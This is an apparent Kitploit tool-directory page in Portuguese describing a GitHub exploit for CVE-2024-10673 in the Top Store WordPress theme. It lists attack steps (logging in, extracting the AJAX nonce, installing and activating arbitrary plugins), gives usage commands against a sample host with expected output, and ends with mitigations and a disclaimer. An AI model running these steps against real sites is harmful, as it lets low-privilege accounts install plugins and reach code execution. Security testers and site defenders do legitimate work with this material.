Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-10673 — Top Store <= 1.5.4 - Autenticado (Subscriber+) Instalação/Ativação Arbitrária de Plugin | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2024-10673
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubnxploited/cve-2024-10673

CVE-2024-10673

Top Store <= 1.5.4 - Autenticado (Subscriber+) Instalação/Ativação Arbitrária de Plugin

Ver Repositório
11há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🔥 Visão Geral

Este script explora a CVE-2024-10673, uma vulnerabilidade crítica encontrada no Top Store WordPress Theme (<= 1.5.4). A falha permite que usuários autenticados com acesso de nível de assinante ou superior instalem e ativem plugins arbitrários por meio de requisições AJAX desprotegidas.

⚠️ Gravidade e Impacto

  • Instalação de Plugin Não Autenticada: Atacantes com privilégios de assinante podem instalar plugins sem aprovação do administrador.
  • Possibilidade de Execução Remota de Código (RCE): Se um plugin malicioso for instalado, atacantes podem executar código arbitrário.
  • Escalação de Privilégios: Atacantes podem instalar plugins que concedem acesso administrativo.

🛠️ Características Deste Exploit

  • Automatiza o ataque extraindo dinamicamente o nonce necessário.
  • Permite seleção de plugin (os usuários podem especificar qual plugin instalar e ativar).
  • Suporta respostas em formato JSON para registro estruturado.
  • Trata erros graciosamente, garantindo execução robusta.

⚡ Como o Exploit Funciona

  1. Faça login no WordPress usando credenciais válidas.
  2. Extraia o nonce AJAX de themes.php?page=thunk_started.
  3. Envie uma requisição AJAX para instalar um plugin (padrão: hunk-companion ou plugin definido pelo usuário).
  4. Envie outra requisição para ativar o plugin.
  5. Produza respostas JSON indicando sucesso ou falha.

🚀 Uso

root@kitploit:~
usage: u.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]

Exploit CVE-2024-10673 - WordPress Plugin Installation & Activation by : # By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password
  -pl PLUGIN, --plugin PLUGIN
                        Plugin slug to install and activate (default: hunk-companion)

Exemplos

  • Instale e ative o plugin padrão (hunk-companion):
    root@kitploit:~
    python exploit.py -u http://192.168.100.74:888/wordpress -un admin -p admin
    
  • Instale e ative um plugin específico (woocommerce):
    root@kitploit:~
    python CVE-2024-10673.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl woocommerce
    

📝 Saída Esperada

root@kitploit:~
{"Logged in successfully"}
{"Fetching nonce value..."}
{"Nonce extracted": "abc123"}
{"Installing plugin: woocommerce..."}
{"Plugin woocommerce installed successfully"}
{"Activating plugin: woocommerce..."}
{"Plugin woocommerce activated successfully"}
{"Exploit completed successfully!"}

🔒 Mitigação

Para proteger seu site WordPress:

  • Atualize para uma versão corrigida do tema Top Store.
  • Restrinja as permissões de assinante para evitar acesso desnecessário.
  • Monitore plugins instalados em busca de alterações não autorizadas.
  • Desabilite a instalação de plugins para não administradores.

⚠️ Aviso Legal

Este script é apenas para fins educacionais e de pesquisa em segurança. O uso não autorizado contra sistemas que você não possui ou não tem permissão explícita para testar é ilegal. Use com responsabilidade!

Por: Khaled Alenazi (Nxploit)

Baixar ferramenta